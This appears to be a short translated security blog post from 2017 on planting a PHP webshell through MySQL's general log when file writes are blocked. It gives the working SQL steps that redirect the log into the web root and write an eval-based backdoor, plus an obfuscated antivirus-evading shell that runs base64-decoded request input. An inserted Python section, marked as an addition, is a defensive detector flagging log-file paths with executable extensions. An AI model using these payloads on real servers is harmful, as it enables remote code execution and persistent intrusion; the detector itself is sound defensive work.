Writing a Shell Through Logs with SQL Statements

A recently published technique for getting a shell through logs using SQL statements.

Posted by Rootclay on 2017-03-23

For when outfile is disabled, or file writes are intercepted


show variables like '%general%'; # check the current configuration
set global general_log = on; # enable the general log
set global general_log_file = '/var/www/html/1.php'; # point the log file at the shell's path
select '<?php eval($_POST[cmd]);?>' # write the shell

Root privileges are required.
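
A defender-side check for the technique above, added here as an example and not part of the original post: it flags audited `SET GLOBAL general_log_file` statements whose target has a server-executable extension or lies outside the expected log directories. The allowed directories, the extension list and the sample statements are assumptions constructed for illustration.

```python
import posixpath
import re

# Assumptions (not from the original post): where MySQL logs legitimately
# live, and which extensions a web server would execute.
ALLOWED_LOG_DIRS = ("/var/log/mysql", "/var/lib/mysql")
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")

# Matches SET GLOBAL general_log_file = '<path>' (also the @@global. form).
SET_LOG_FILE = re.compile(
    r"""set\s+(?:global\s+|@@global\.)general_log_file\s*=\s*(['"])(.*?)\1""",
    re.IGNORECASE,
)

def check_statement(sql):
    """Return the reasons a statement is suspicious (empty list if clean)."""
    m = SET_LOG_FILE.search(sql)
    if not m:
        return []
    # Normalise so '..' segments and backslashes cannot hide the real target.
    path = posixpath.normpath(m.group(2).replace("\\", "/"))
    reasons = []
    if path.lower().endswith(SCRIPT_EXTS):
        reasons.append("log file has a server-executable extension")
    if not any(path == d or path.startswith(d + "/") for d in ALLOWED_LOG_DIRS):
        reasons.append("log file is outside the allowed log directories")
    return reasons

def scan(statements):
    """Return (line_number, statement, reasons) for every flagged statement."""
    hits = []
    for n, sql in enumerate(statements, 1):
        reasons = check_statement(sql)
        if reasons:
            hits.append((n, sql, reasons))
    return hits

# Constructed sample of audited statements (e.g. from an audit plugin or proxy).
SAMPLE = [
    "show variables like '%general%'",
    "set global general_log = on",
    "set global general_log_file = '/var/www/html/1.php'",
    "SET GLOBAL general_log_file = '/var/log/mysql/general.log'",
    "set global general_log_file = '/var/log/mysql/../../www/html/x.PHP'",
]

if __name__ == "__main__":
    for n, sql, reasons in scan(SAMPLE):
        print(f"line {n}: {sql}\n  -> " + "; ".join(reasons))
```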


Antivirus evasion

SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"
